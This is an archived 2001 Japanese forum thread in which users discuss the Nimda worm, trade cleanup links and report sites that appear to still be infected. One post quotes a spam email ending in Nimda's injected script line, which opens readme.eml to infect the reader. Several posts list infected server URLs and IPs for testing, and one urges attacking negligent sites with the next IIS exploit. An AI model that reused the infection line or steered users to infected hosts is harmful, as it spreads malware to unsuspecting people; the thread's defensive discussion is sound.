「Nimda !! 」【その４】

鬱したな！！親父にも鬱された事無いのに！！

●前々々スレ 「Nimda !!」
http://ton.2ch.net/test/read.cgi?bbs=sec&key=1000870301

●前々スレ 「Nimda その弐!!」
http://ton.2ch.net/test/read.cgi?bbs=sec&key=1000973617

●前スレ 「Nimda !! その産」
http://ton.2ch.net/test/read.cgi?bbs=sec&key=1001177275

●関連リンク
マイクロソフト「Nimda ワーム に関する情報」
http://www.microsoft.com/japan/technet/security/nimdaalrt.asp

IPAセキュリティセンター
http://www.ipa.go.jp/security/topics/newvirus/nimda.html

シマンテック株式会社
http://www.symantec.com/region/jp/sarcj/data/w/[email protected]

トレンドマイクロ株式会社
http://www.trendmicro.co.jp/nimda/

日本ネットワークアソシエイツ株式会社
http://www.nai.com/japan/virusinfo/virN.asp?v=W32/Nimda@MM

トレンドマイクロ・Nimda駆除単体ツール
http://www.trendmicro.co.jp/nimda/tool.asp

現在でまわっているデマ情報
http://keisui.com/GIGAZINE/cgi-bin/news/html/lg/000325.htm

IEバージョン確認法
http://www.geocities.co.jp/Technopolis/2082/Soft/Ie/OE5str.htm

オンラインスキャン
http://www.trendmicro.co.jp/hcall/scan.htm

ウィルス情報
http://www.symantec.co.jp/region/jp/sarcj/data/w/[email protected]
http://www.nai.com/japan/virusinfo/virN.asp?v=W32/Nimda@MM
http://www.trendmicro.co.jp/virusinfo/troj_nimda.htm

Samba における Nimda ワーム対策
http://www.samba.gr.jp/project/kb/J0/1/09.html

●ニムダはWin95/98系など一般のパソコンでは感染しないのですか？

します。

(894)
9X系も感染するとある
http://www.symantec.com/region/jp/sarcj/data/w/[email protected]

●感染して作られた〜.emlをマイコンピュータやエクスプローラーでクリックしただけで 再び感染することはある？（688）

あります。


●フォルダの設定でWeb表示（.JPGを選択と左側に寒ネイルが表示されるような）で感染サイトの.lnkファイル（お気に入りのこと）を選択す
ると？ （460）

(463)
感染可能ブラウザの場合、選択（開くではない）だけで感染すると思われる。
これ、感染前の.lnkでもリアルタイム更新してると思われる。

(464)
WEB表示にしててネットワーク経由で入れられた *.emlファイルを
確認するため右クリックして選択しただけで感染した例がある。
（IEが未対応だったので）

補足：.htmlなどのファイルでも同様と思われる

●検索をしてreadme.eml readme.exeファイルがなくても、エクスプローラでファイル操作するだけで感染することがありますか？（698）

あります。

(569)
C:\WINNT\Temporary Internet Files\Content.IE5\LHMMLNGA のような所に格納されている
main[1].html
みたいなファイル（キャッシュファイル）にふれてしまうと場合によっては感染する。




●readme.emlファイル・reame.exeファイル・nimda感染ファイル(.htmlなど) を手動で検索、削除。安全？(701)

(701)
場合によってはさわっただけで感染する。
その場合ドラッグや右クリックで削除できない（感染する）


【みなさんの人柱精神はたとえささやかなものであってもムダにはいたしません(-人-)】

FAQer君がんばってるね。

ご苦労さまです。

http://3403687705/

CodeRed も１０月になっても消えませんね。

>>7
すいません、今回のコピペは>>1さんにお願いしちゃいました(^^ゞ
３では新しいFAQ項目も増えていないと思いますので・・。

>>1さん、ありがとうございますm(_ _)m

>1
お疲れさまー。
今度から、関連リンクやFAQは>>2-10の辺り・・・とやると
よろしいかもー。

>>10
CoderedIIは既に新種になっていたみたい。
http://japan.cnet.com/News/2001/Item/010828-3.html?rn

http://www.microsoft.com/japan/windows2000/downloads/servicepacks/sp2/default.asp
で、WIN2K SP2のCD-ROMを頼んだ（24日９
今日届いた。
意外と早かったなぁ。

>>13

らしいねえ。CodeRedｽﾚでも、10月になっても止まってないってカキコがあった。

まあ、世界中がまだ10月になったわけじゃないけど・・。

[email protected]
からNimda付きメールが来たぞ。
McAfeeが捕まえた、入れてて良かった。

>>16

来るのかぁ＜ニムダメール

このｽﾚでの報告は初？

マジです。ソース書き込もうか？

>>18
できれば。

</body>が無いのでこれを書き換えてるのか？

ここから→
From [email protected] Sun, 30 Sep 2001 06:23:47 -0700
Received: from [4.16.194.109] by hotmail.com (3.2) with ESMTP id ; Sun, 30 Sep 2001 06:22:42 -0700
Received:from rly7.fpf.slu.cz (rly7.fpf.slu.cz [172.31.109.14]); Sat, 29 Sep 2001 10:24:38 -0400 (EDT)
Received:from(209.156.84.66); Sat, 29 Sep 2001 10:24:38 -0400 (EDT)
X-Date: Sat, 29 Sep 2001 10:24:38
From: <[email protected]>
Message-Id: <KbSmp24a.KFSm7i5IT4wlzYi.KtWmWi2C.KM5V7ueZO.KTJhqjq@rly7.fpf.slu.cz>
Subject: Get Rid Of Debt - Consolidate!
Mime-Version: 1.0
Content-Type: text/html; charset="us-ascii"
Date: Sat, 29 Sep 2001 21:25:40


<html>
<head>
</head>
<body bgcolor="#ffffff" topmargin=2 leftmargin=5 rightmargin=5 marginwidth=5 marginheight=0 >
<div id="divMsgrObject" style="display:none"></div>
<p>
<s


<CENTER>
<table border=0 width=100% cellpadding=0 cellspacing=0 bgcolor="#000000">
<tr><td valign=top>
<pre>

</pre>
<p align="center"><B>
<FONT SIZE=+3 FACE="Arial,Helvetica" color=#ffffff>CUT YOUR  MONTHLY DEBT
PAYMENTS IN HALF !</FONT></B>
<p align="center"><B>
<FONT SIZE=+3 FACE="Arial,Helvetica" color=#ffffff><i>EVERYONE QUALIFIES!</i></FONT></B></p>
<p align="center"><B>
<FONT SIZE=+3 FACE="Arial,Helvetica" color=#ffffff>FREE PHONE CONSULTATION - NO
OBLIGATION!</p>
<P align="center"><a HREF="http://www.web-advs.net:81/debts/" xonMouseOver="window.status=''; return true;" target="_blank"><font color='HotPink'>CLICK
</font></a></FONT><a HREF="http://www.web-advs.net:81/debts/" xonMouseOver="window.status=''; return true;" target="_blank"><font color="HotPink" size="+3" face="Arial,Helvetica">HERE
FOR DETAILS!</font></a><P align="center"><a href="mailto:[email protected]"><font face="Arial,Helvetica" size="1" color="#FFFFFF">Click
Here To Be Removed</font></a></B><br>
<br>
</td></tr>
</table>

</form>

<html><script language="JavaScript">window.open("readme.eml", null, "resizable=no,top=6000,left=6000")</script></html>


←ここまで

>>20
これは若干違うもののような気がするな。
ワームが送ってきたメールとは思えない…

思うに、このメールの原文がDISK上にHTMLファイルで保存されてて
そこにNimdaが感染して、最下行を書き換えて、
Nimdaは駆除したけど(?)そのままになってたのを、
単純にSPAMで送ってきた、という機序なのではないかと。
メールで誘導してるURLのポートが81番つうのが怪しいんだが(w

どちらにせよ送信元が間抜けなのは間違いなかろう。

お騒がせしました。

>>22
いや、貴重なサンプルです。ありがとうございました。

その画像ならココ
http://www.f2.dion.ne.jp/~impact14/

このｽﾚと、にむだにはいろいろ勉強させてもらったよ・・。

http://www.bee.woodland.co.jp
駆除はしたみたいだけど、まだIIS/4.0なんだよなー

今日の夕刊フジにニムダが載っていますね。

流行後一段落後に新聞に載ったのは初？

あ゛っ
まだreadme.emlが残ってる。

>>26

いつ再感染するんかワクワク

>>28

http://www.bee.woodland.co.jp/readme.eml

だめぢゃん��(￣△￣；

なにやってんだよ。バックアップから上書きでリストアしただけか？
豪快なウイルス駆除法もあったもんだ・・。

http://www.zumensoft.co.jp/

ここは閉鎖中。

beeとどっちがさきにまともになるか。

>>31
http://cgibbs.mmjp.or.jp/bbs/show/www.zumensoft.co.jp/bbs
Norton Antivirus2000がダメだって。。。。

>>32

はっきりいってやりたいのだが、ウイルススキャンソフトを実行して再起動するだけしかやらないなら、どのソフトだってダメだ＜対にむだ

IE6で感染する事例が増えた原因がわかった・・。


IEで「.exe」などのファイルにアクセスすると、「ファイルのダウンロード」
という確認ダイアログウィンドウが現れるわけですが、IE 5のときは、

次の場所からファイルをダウンロードするように選択しました。
このファイルの処理方法
○ このプログラムを上記の場所から実行する
◎ このプログラムをディスクに保存する
[ OK ] [キャンセル]

というように、デフォルトはディスクへの保存となっていて、直接開くには、
二回のクリック（「上記の場所から」と「OK」）が必要でした。

それが、なんと、IE 6では、「開く」がデフォルトになってます。

キャプチャ画像（上がIE 6、下がIE 5）
http://java-house.etl.go.jp/~takagi/security/misc/ie6-filedownload-dialog.png

これって危な過ぎるような。ワンクリック手がすべるだけでドカンでしょう。

■『Nimda』、再襲来は不発
http://japan.cnet.com/News/2001/Item/011001-3.html?mn
『Nimda』(ニムダ)攻撃の第2波は失敗したようだ。Nimdaワームが28日
に再発するとセキュリティー企業は警告していたが、この懸念は現実の
もとはならなかった。最初の感染から10日後に活動を再開するとされて
いたが、10日後にあたる28日の朝、Nimdaの再襲来を告げる徴候はほと
んど見られなかった。

>>32

>ウィルス駆除ソフトはシマンテックNorton Antivirus2000を使っていましたが効き目がありません

効き目がないというのは何を意味してるんだ？
自分がウイルスを助けるような操作をしても注意してくれないということか？

age

>>32

>な〜に寝ぼけたこと言ってるんですか。
>２ちゃんねるで晒されてまっせ。
>http://ton.2ch.net/test/read.cgi?bbs=sec&key=1001864573

ﾜﾗﾀ&ﾕｳｷｱﾙ

>>38

にちゃんねらーにもいいひといるんだなぁ・・。


づめんそふとのヒトは前ｽﾚもみてくれるだろうか。
http://ton.2ch.net/test/read.cgi?bbs=sec&key=1001177275

>>34
そそ危険危険デフォルトが開くってなんとかならんかな。
デフォルトの変更方法求む

なんじゃこら＞にむだの項

http://www.hh.iij4u.or.jp/~noguti/docs/gaihuu/9gatunikkikou.html

をいっ(^^;

http://www.d-link.co.jp/

予想通り再開せず

http://www.with9.com/

つーか、恥ずかしくないのかね。

看板に落書きされたようなもんだろう。
いつまでも閉鎖したままだったり、汚染されっぱなしで。

会社の看板もこうなのかね、こういう会社は。

http://www.unionsys.co.jp/
http://nac-ltd.co.jp/
http://www.htsc.ap.titech.ac.jp
http://www.advaoptical.co.jp/
http://www.sano-mfg.co.jp
http://www1.fl.kansai-u.ac.jp/
http://www.inet-service.co.jp/

http://pc2.autechs-unet.ocn.ne.jp

http://www.with9.com/

http://211.135.69.237/hoge

なんなんだよここはっ（＞＜）

ns1.ojipack.co.jp
土曜にホームページに載ってたアドレスにメールした。
けど、今日になっても直してな〜い。

p4166-flets-adsl01osakakita.osaka.ocn.ne.jp
日本在住韓国人？

http://plaza12.mbn.or.jp/~kaiun/

なんだこりゃ

>>49
ﾜﾗﾀ

http://www.hyundaijapan.co.jp/
また鯖止めてるョ。

>>51

弐週間も何やってたんだ(--#

>>32

このヒトたちのカキコには最新パターンファイルにアップした形跡がないんだけど・・。

SP2収録された雑誌って発売されました？

nimda発生の頃から今までずっと鯖停止している会社は、
鯖がnimdaに汚染されて復旧できていない、とみなして良いのだろうか？
結構そういう会社があるのだが。

しかしそういうところは恥ずかしくないのかね。
>44の言う通りだよ。
きちんと管理できないなら最初から看板（サイト）なんて出さなければいいのに。

>>54
ttp://www.vwalker.com/news/0105/24_/24_190311.html

>なお，Windows2000SP2はDOS/Vmagazine 6月15日発売号のCD-ROMに収録予定。

厨房質問ですが、Nimdaに感染したサイト一覧をリアルタイムで出している処ってあります？
ご存じの方はおせーて┌(_ _)┐

>>57
逆にききたい。
ダイアルアップ非固定アドレスの感染者がいたらどうやって
リアルタイムでわかるんだい？

>>58
攻撃されれば分かる(w

ダミーのroot.exeとかredeme.exeとか作っておいとけ（ww

>>57
リアルタイムとは言えないかもしれないが、専用のニムダ晒しサイトはなくとも、一般のサービスでなぜか教えてくれるところがある。

アタマ使うなり、過去ログ読むなりするんだな。

http://cgibbs.mmjp.or.jp/bbs/show/www.zumensoft.co.jp/bbs

ここのヒトは読んでくれたのかね。

>>57は最終的に何が知りたいのかわからんが、過去の感染サイトを巡回すると、経験上かなりの確率で再発してるぞ（ｗ

>58
> ダイアルアップ非固定アドレスの感染者がいたらどうやって
> リアルタイムでわかるんだい？
もぉ〜ん、アタシ厨房なんです。揚げ足取られるとすぐ転んぢゃうんです。

訂正します。
ある程度まとまって、Nimda感染サイトを一覧できるところを教えてください。
目的は、IE6の動作を試してみたいんです。

>>58
ﾊｱ？

>>57の質問はリアルタイムって逝ってるんだから
攻撃されなきゃわかんないだろ。
それとも自分が攻撃されたらリアルタイムサイトも攻撃されてる
のか？（ｗ
Nimda感染サイトは感染すると全世界のIPを攻撃してるのか？

それを踏まえてちょっとからかったんだよ。

>>58 → >>59でした。

>>65
過去ログ読め。

>>64
からかったつもりが自分の厨房ぶり晒してるぞ。

>>63 = >>57

繰り返しになるが、ダイアルアップの人が感染者なら
攻撃受ける前にすぐPC落としちゃったらそいつが感染者か
どうかわかんないだろ？
自分で鯖たててみるのが一番手っ取り早いと思う。

この板でしばしば取り上げてる｢また感染してるのかよ｣なサイト
はフレッシュアイで検索してるだけだと思われるが、この方法
だとIIS以外ででっちあげた自作自演サイトも区別しないので
おすすめしない（ｗ

>>67
どこが？
リアルタイムで知るっていうことは、今現在の感染サイトの実数
を知りたいと解釈したが？
それを鯖たてればわかるといわれてもね
一部しかわかんないよ（ｗ

>>65
過去ログに実数がわかるサイトなんてあったか？
見たおぼえないので示してください。

そんなサイトはありません。

また間違えたよ。鬱だし脳

57=64でなくて、58=64だよぉ

>>63
なんか>>63の質問の趣旨を理解できない厨房がいるようだが・・。

このｽﾚの感染しているよ、と晒されているサイトはあたってみたのかい？>>63

>72
> このｽﾚの感染しているよ、と晒されているサイトはあたってみたのかい？>>63
厨房でスマソ(;´Д｀)

アタシ個人はいくつか逝ってみました。
何がやりたいかと云うと、私を含めて何人かで、OS再インストール予定マシンでIE6を試そーよと、ドキュソ計画を実行中なんです。
アタシはもう十分なんですが、アタシ以下の消防が感染サイトをきぼーん、ただしメールでURLを書いて送るな、バックアップした後もっぺんクリックしたら感染するだろーが、まとまった情報をながしている処をおせーろｺﾞﾙｧと責めるんです。

ここの「Nimda!!」１〜４を示したんですが、消防だからテメーで過去ログ読まないんです。
ぢゃあアタシが過去ログ読んで、それをまとめてアタシのホームページにアップするんかいと、今泣いているんです。

すみません、職人さんが集まっているところで、厨房がスレ汚したようです。
逝きます。

>>73
そうするとこのへんかねえ。

http://people.site.ne.jp/mirror2/Nimda/Nimda.txt
https://www.netsecurity.ne.jp/article/8/2923.html
https://www.netsecurity.ne.jp/article/9/2842.html
https://www.netsecurity.ne.jp/article/8/2874.html
https://www.netsecurity.ne.jp/article/8/2877.html

だが先週あたりまではまめに更新していたものの、今週は更新されてないし、
駆除・閉鎖されているところも多い。
（たぶん今も感染状態で開いているところはほとんどないはず。）

感染サイトは生もので、やはりというか当然というか普通は
晒されたら閉鎖・駆除をしてしまう。
73の趣旨からすると、現役感染サイトが知りたいのだろうから、
このｽﾚをチエックして感染してるよ、となったらそれで動作確認、となるんだろう。

ただIE6はいくつかの条件で感染することがわかっているから、
実際に感染しているサイトで感染実験するのはあまり薦められないし、
そのうちひとつの条件で感染した・しないといってもあまり意味はないように
思う。

>74
> そうするとこのへんかねえ。
わぁをぅ、有り難うございます。
https://www.netsecurity.ne.jp/
ここからたどると、ある程度最新が判るんですね。
これで消防に逝ってもらいます。

> ただIE6はいくつかの条件で感染することがわかっているから、
> 実際に感染しているサイトで感染実験するのはあまり薦められないし、
> そのうちひとつの条件で感染した・しないといってもあまり意味はないように
> 思う。
アタシがやった時はWindows Media Playerが起ち上がったんですが、ダウンロードで開くがデフォルト選択状態を試したいと消防が駄駄捏ねるんです。ほかの*.exeではダメなんです。
ちなみに消防とは上司です。
さらにアタシの目的は、消防以下ばかりの会社のマシンからIE6を駆逐しておかないと、大変なことになるのを実証したいんです。
面倒かけました。

>>75
とりあえず感染サイト。

http://211.96.111.55/

>>73
>ただしメールでURLを書いて送るな、
>バックアップした後もっぺんクリックしたら感染するだろーが、
>まとまった情報をながしている処をおせーろｺﾞﾙｧと責めるんです

ここらへんがﾎﾝﾄ頭悪いよね。
別にフルアドレス書かなくてもいいじゃん。
例えば、211.96.111.55　これだけ書いて
http://自分で付けさせりゃ済む話だと思うが。

と言いつつ、おまけ。
http://www.stride.co.jp/~z32/cgi-bin/worm.cgi

ありゃま。

http://z.nttec.edu.cn

http://www.d-plan.ne.jp/

readme.eml ダウンロードのスクリプトが２行あるのは
２回改竄されたってこと？

＞快適ネットが自慢です！！ 大きな信頼！！ 低コストが魅力です！！
が売り物のネットワークサービス会社だが。。。

>>79
index.* には２種類の感染経路があるので
２行書かれてしまうみたいです。

eml その他を削除し、セキュ穴やバックドアも埋め、
パッチを当てているとしても、
Webのコンテンツにスクリプト残したままでそれを公開ってのは
結構見た目不細工だと思うのだが、みなさん平気なのかな。。
（このタイプのサイト結構ある）
よごれてない原本使ってかきもどせばよかろうに。

>>81
ヨソに作ってもらってるから原本がない（なくしちゃった）だったり（ｗ

いや、けっこうあるんです、こういうとこ（苦笑

なるほど、ソースの最後にJavaScriptが空で残ってるサイトは
そういうことなのか（ｗ

>>80
じゃあこれなんかは・・？

http://ns.ers.minato.tokyo.jp/

>>84
バックドアはあいてるね。

こんなマヌケな法案審議する暇あったらこういうのをなんとかしろ
http://www.mainichi.co.jp/digital/houan/01.html

http://www.zumensoft.co.jp/

復活したのか？やればできるじゃん？

>>86
と、思ったが

ページが見つかりません

のリンクがいくつもあるな。

>>84
１２か？１２もか？


<html><script language="JavaScript"></script></html>
<html><script language="JavaScript"></script></html>
<html><script language="JavaScript"></script></html>
<html><script language="JavaScript"></script></html>
<html><script language="JavaScript"></script></html>
<html><script language="JavaScript"></script></html>
<html><script language="JavaScript"></script></html>
<html><script language="JavaScript"></script></html>
<html><script language="JavaScript"></script></html>
<html><script language="JavaScript"></script></html>
<html><script language="JavaScript"></script></html>
<html><script language="JavaScript"></script></html>

>>79
どうやらIISからApacheに変更したようだね。
http://uptime.netcraft.com/up/graph/?mode_u=off&mode_w=on&site=http://www.d-plan.ne.jp/

NimdaやCodeRedの影響で、IISから他のWebサーバに
乗り換えたサイトってどのくらいあるんだろう。

IISから他への移行って難しいことが多いみたいだ
けど。

>>90

>>86 とか？

>>91
違うような気がするが。
http://uptime.netcraft.com/up/graph/?mode_u=off&mode_w=on&site=http://www.zumensoft.co.jp/

>>92
あ、Web鯖だけを、ってことね。

ここはWindowsごとおっぽりなげた、と。

ちょっと聞いておくれよ。　さっき２ｃｈ見ててNimdaに感染しちゃったよ。
安置うぃるすで除去してくれたけどね。
ＩＥ６なんて役に立たないジャン。

IEはみなダメだよマイクロソフト
信じてはだめだよ。
アンチウィルスソフト入れてればわかるが
いれてない人は知らずに使用してると思うよ

http://cgibbs.mmjp.or.jp/bbs/show/www.zumensoft.co.jp/bbs
この会社本当にアプリ開発してるんですか？
多分ユーザーにはパソコンに詳しい神様みたいな存在なんでしょうけどねー。

人間を観察するという立場で見れば興味あるサンプルではあるょ。

http://www.nt.sakura.ne.jp/~rose/

>>96
>２ちゃんえるというＨＰでワクチンを入手できるのですか？

再度ﾜﾗﾀ
かきこした人ちゃんと教えてやれ

>>95 そっかやっぱり
当分ＢＳＤ使います。

>>94
IE6は、完全インストールしないと（OE使わなくとも）

私は、何度もNimdaサイトで試験済みだよ
ダウンロードしますで、Yesにしたら、感染するよ

>>98

再感染も時間の問題か・・。

http://pcweb.mycom.co.jp/news/2001/10/02/15.html

Nimdaに感染するとどうなるんですか？
あたいのキャッシュにreadme.emlとか有って
即削除したけどこれでいいんですよね。

>>102
これに該当するファイルを以前窓の杜からダウンロードしてしまった。(9/22日）
ついでに実行も。

自己解凍形式のexeファイルで、解凍すると、
fix_nimdaフォルダが作成され、中にFIX_NIMDA.exe Slide.dat slide.exe等
7つのファイルが出来る。

どうみても>>102の条件に合致するのだが。

さっき窓の杜見てみたら、その事に関して何のインフォメーションも無く。
fix_nimdaの紹介もアップデートされていた。
窓の杜は怪しいファイルを無責任にばら撒いて知らん振りするつもりなのか？
それともただ知らないだけなのか？謎。

>>104
祭りか？　祭りか？
ﾜｼｮｰｲ

>>104
ニセモノは４つのファイルだが、７つなのか？

FlashGetでのダウンロード履歴をみて見たら、
ftp://ftp.forest.impress.co.jp/pub/win/util/security/trendmicrofixnimda/fix_nimda.exe
ここになっていた。（いまは消えて存在しない）
さっき見てみたら同じディレクトリには3180fixnimda.exeが有った。

なんか非常に不愉快。詳しい情報希望。

ごめん本物も４つのファイルが解凍されるとある。
ってことはそれらを含めた７つというのも妙だな。

>>106
107でも書いたけど、fix_nimda.exeで(87,318バイト）
そこからダウンロードして解凍されたフォルダの中身は
fix_nimdaフォルダの中に

faq.txt FIX_NIMDA.exe NIMDA対策ツール使用許諾.pdf Slide.dat
slide.exe お読みください.txt 始めにお読みください.txt　の7つだった。

>>109
http://search.impress.co.jp/cgi-bin/namazu.cgi?idxname=forest&query=FIX_NIMDA&imageField.x=23&imageField.y=6
http://www.trendmicro.co.jp/nimda/tool.asp
バージョンＵＰしてるみたいだね

ttp://www.miruku.co.jp/usr/find/higa.htm
尋ね人(ｗ

>>111
鯖感染バックドア付き

>>110
でもfix_nimda.exeをダウンロードした時はFIX_NIMDA.exe(.comじゃなくて)
だった。それにslide.exeとSlide.datって一体何なのだろうか？

私と同様な覚えの有る人（窓の杜経由fix_nimda.exe入手)は居ないのかな？

Mimraに感染しました。

>>104
http://inet.trendmicro.co.jp/virusinfo/vcon/default3.asp?VName=TROJ_BIONET.313
多分もう調べたと思うけどfix_nimda.exeに入ってるBionetに感染すると
ＩＣＱ経由でリモートコントロールされるみたいっすよ。

http://www.isee.net.cn/

http://www.trendmicro.co.jp/nimda/tool.asp

保存していたぺージから、

Version 1.22　ASPファイルの駆除に対応。
　　　　　　　　　WindowsNTのワトソン博士でエラーを出力する件への対応。
　　　　　　　　　非英語名ファイルが駆除できない件に対応。
　　　　　　　　　ゲストユーザーアカウントの無効に対応。（WindowsNT/2000）
　　　　　　　　　オプション /UNSHARE を追加。

このツールは3つの部分で構成されています。
　1.FIX_NIMDA.exe　--　ツールのメインの部分
　2.SLIDE.DAT -----　HTM/HTML/ASPを検索および駆除用パターンの部分
　3.SLIDE.EXE ----　HTM/HTML/ASPを検索および駆除を行う部分
　　　　　　　　　　　　　(FIX_NIMDA.exeから実行されます)
　4.README_J.txt　--　Readmeファイルです。ご使用の前にお読みください。
------------------------

で、今見てきたら、変わってた。

Version 1.23　駆除処理のログ記録に対応。
　　　　　　　　　検出精度の向上。

ツール実行時に解凍されるファイルは以下の４ファイルです。
　1.Fix_NIMDA.com　--　駆除ツール本体
　2.FixNimda.bat -----　自動実行用バッチファイル
　3.psapi.dll ----　実行に必要なDLLファイル
　4.readme.txt　--　Fix_NIMDA.comマニュアルファイル

ファイルが7つ？

http://210.102.151.10

>>115
そうなんですよね。
一応レジストリとか調べて見たけれど、感染している様子は無いから、
ただの杞憂だったのかな。どっちなのか本当にわからん。

しかし窓の杜でアップデートをした時にひっそりとファイル名や構造が変わって、
以前ダウンロードしたものが安全なのか危険なものなのか情報を提供しない
という姿勢には疑問を感じる。

http://www.trendmicro.co.jp/nimda/tool.aspに、
>ダウンロードされる前に、使用許諾契約書（PDF形式 9KB）をお読みください。

ってあるから、あとは、
　[　お読みください.txt　始めにお読みください.txt　]
の２つがくっついてるのか。

http://pcweb.mycom.co.jp/news/2001/10/02/15.html
では、メールの添付ファイルって書いてるから、
ダイジョブじゃないの？たぶん（ｗ

http://210.103.173.1/

やっぱkrはニムダ大国だ・・。

http://wtc.trendmicro.com/wtc/
日本の感染報告件数がピーク時の300分の1ぐらいまで激減しているようなんですけど
感染しているいないに関わらず興味が無くなっただけなのか？

ところでアタックは相変わらずなんでしょうか？
ＣＡＴＶだとわからないので教えてください。
私の所はCodeRedが1日の8時ぐらいを最後に永眠したようで1件も来なくなりました。

>>123
http://cgibbs.mmjp.or.jp/bbs/show/www.zumensoft.co.jp/bbs
ここを読むと分かりますが、感染していても動いていればおかまいなしというのが趨勢のようです。

本人はいいかもしれんが
他人に広がる以上，放置はねぇ

>>125
そういう自覚はまったくないようです。このbbsにもそういう話は出てこないし元感染サイトの
www.zumensoft.co.jp
でも感染告知は一切なしです。

迷惑をかけたなどという意識はまったくないのでしょう。

[email protected]に、以下のようなメールを送ったyo!


このサイトは数日に渡ってウイルスに感染し訪問者はじめ他社サイトを攻撃していましたが、感染の事実が書かれていません。

感染サイトは感染当時の来訪者に向けて広く告知すべきではないでしょうか。

（参考）
http://www.cameraguild.co.jp/officeheliar/moo/

片手落ちの復旧ではなく、きちんと警戒を呼びかけるべきだと思います。

>126
そういう向きには、新たなIISの穴出てEXPLOIT出たら、真っ先に落してやるのが
良かろうと思われ。。。

そう言えば1日にＪＲ東海の指定席予約システムが2時間ダウンしていたんだけどニムダの再感染かもね。
社長が記者会見で「ニムダに社内のネットワークとホームページが感染したがＦＷで対処した」と言ってたんで
内部の再感染し易い環境はそのままだったのだろう。

[email protected]

[email protected]

[email protected]

[email protected]

[email protected]

[email protected]

[email protected]

x

IPですまん。
210.92.128.194
210.249.116.115
210.159.242.140
210.130.178.147

>>129

これも同類？

http://headlines.yahoo.co.jp/hl?a=20010927-00000023-mai-bus_all

＜ソニー銀行＞システムに障害　口座サイトにログインできず
同行はサーバーの一部に障害が発生したと説明しているが、原因は判明していない。

http://www.with9.com/

奥のほうの１ページ分の鯖だけじゃなかったのか・・。

重要なお知らせ


9/18当サーバーは『Nimdaウイルス』感染し、皆様には大変な迷惑と、ご不便をおかけすることなり大変申し訳ございませんでした。

同ウイルスにより、当サーバーは深刻な被害をうけ、現在のサーバーは仮運用となっているため、動作スピードが十分でなない可能性がございます。 早急に完全な状態に復旧する所存ですのでご理解いただけますようお願いいたします。

厨房な質問ですいません。私も最近ニムダに感染したのですが、
とりあえず、ニムダ駆除ファイルをＤＬして駆除したのですが、
変なファイルは全部消し去ったみたいですが、コレって一応
完全駆除してるのでしょうか？

それとも表向きだけの応急処置？

ttp://eatkyo05188.adsl.ppp.infoweb.ne.jp/
こいつしつこい。
警告しようにも認証画面から先に進めないし・・・

Asia Pacific Network Information Center
って糞？

>>135
一応は変なファイルは駆除できてるかもしれないがトロイの木馬
まで除去したかどうかはわからない。
っていうかこれガイシュツじゃないの？

>>135
駆除しても，穴塞いどかないと何度でも感染するぞ

>>136
半端にきちんとしていて、はんぱにズサンなサイトだな・・。

>>135
http://www.symantec.com/region/jp/sarcj/nimda.html
よく嫁。

>>141
こういっちゃなんだがいまいちわかりにくいな、このページは(^^;

>>142
ゼイタクはウイルスと同等 (▼、▼メ)メラメラ

>>143
すまんこってす。

私は135ではないのだが、これで135みたいな質問してくる人に
138や139みたいな内容を141（のURL）から汲み取れるのかいなぁ、
と思った次第。

141さんの引用が不適切というのではなく、www.symantec.comの
書き方が（135のようなヒトには）わかりにくいなぁ、と。

>ゼイタクはウイルスと同等
御意。謹んでお言葉お受けしますm(_ _)m

http://cgi.apnic.net/apnic-bin/ipv4-by-country.pl?country=kp

北朝鮮(.kp)からこねーなーと思っていたら、こうなってたのか・・。


韓国の場合
http://cgi.apnic.net/apnic-bin/ipv4-by-country.pl?country=kr

>>144
141、143ですが、悪気はないのであしからず。2chだしぃ〜(~_~;)
このしまんてっくサイトを１回読んで理解しようとしちゃい神崎(#／__)／。
Nimdaは活動自体が比較的複雑・多義にわたると思われ、何回も読んで理解すべし。
気に入らん場合はこっちはどうだ？

Nimda情報リンク
http://www.trendmicro.co.jp/nimda/
http://www.microsoft.com/japan/technet/security/nimdaalrt.asp
http://www.ipa.go.jp/security/topics/newvirus/nimda.html
http://www.forest.impress.co.jp/article/2001/10/01/accessranking.html
http://www.so-net.ne.jp/manual/topics/virus/index.html

まだ足らんか (▼、▼メ）メラメラ

ってか、146だがこのスレ最初から読めばあぼ〜ん。。（使い方ちがう？）
agesage厨房ﾜﾗﾀ意味不明スマソ

数段階の仲介を経てからでしかその知識を得られないなんて。
理想ならその業界の技術書を熟読するのが一番なの。
サバ構築だって然り。ネットとは何か？と言うこと。
書店にあるものを読んでるうちは中級どまり。
高校の微積分を学ぶときは決してニュートンやライプニッツの原書を読まないのは単に難易度の問題。
機会があれば読むべき。

From : [email protected]
Reply-To :
[email protected]

To : [email protected]
Subject : Do you owe the IRS money? [l5db4]
Received: from [199.233.104.147] by hotmail.com (3.2) with ESMTP id MHotMail***; *, * * 2001 **:**:** -0700
Received: from tkwof.msn.com (wc-client01.ntelos.net [216.12.96.66]) by mandan.combination.com with SMTP (Microsoft Exchange Internet Mail Service Version 5.5.2650.21)id TYM3YP85; Tue, 2 Oct 2001 16:43:15 -0500
From [email protected] Tue, 02 Oct 2001 14:50:04 -0700

viking.combination.com (pri=10)
<<< 220 mandan.combination.com ESMTP Server (Microsoft Exchange Internet Mail Service 5.5.2650.21) ready
>>> HELO rlytest.nanet.co.jp
<<< 250 OK
>>> MAIL FROM:< TEST http://www.nanet.co.jp/rlytest/ requested from [email protected] >
<<< 250 OK - mail from < TEST http://www.nanet.co.jp/rlytest/ requested from [email protected] >
>>> RCPT TO:<[email protected]>
<<< 250 OK - Recipient <[email protected]>
>>> QUIT
<<< 221 closing connection
問題あり：不正な中継を受け付けます。
(199.233.104.147)
ORBS database...登録されていません。
VIX realtime block list...登録されていません。


[email protected]

[email protected]

[email protected]

[email protected]

[email protected]

>>134
ここもまだServer: Microsoft-IIS/4.0だった。
Coderedが無くなるとフォマト&インストロールでバックドアが安易に開かないから
ニムダにも感染し難くなるって事でセキュリティホールが有っても安心しちゃうのかな。

ニムダ＋CodeRedで暫くするとＯＳや共有ドライブも含めたデーターの破壊ルーチンが入っているような
ワームが出る可能性は十分にあると思うんだが･･･

>>150

あるでしょう、もう一発。XPが出て、やれ悪ティべーしょんがどうの、使用期限がどうの、初期バグがどうの、なんてなったら後生大事に旧バージョンを入れる（オマケにパッチは意識の外）所は非常に増えそうな。

予感だけど。

http://www.htsc.ap.titech.ac.jp
http://www.kano.arch.waseda.ac.jp/
http://www1.fl.kansai-u.ac.jp/

大学の研究室の鯖って、ニムダ後閉鎖されたまま再建される
雰囲気がないんだけど、やっぱこういう騒ぎ起こすと普通は
鯖建立権剥奪？

>>151
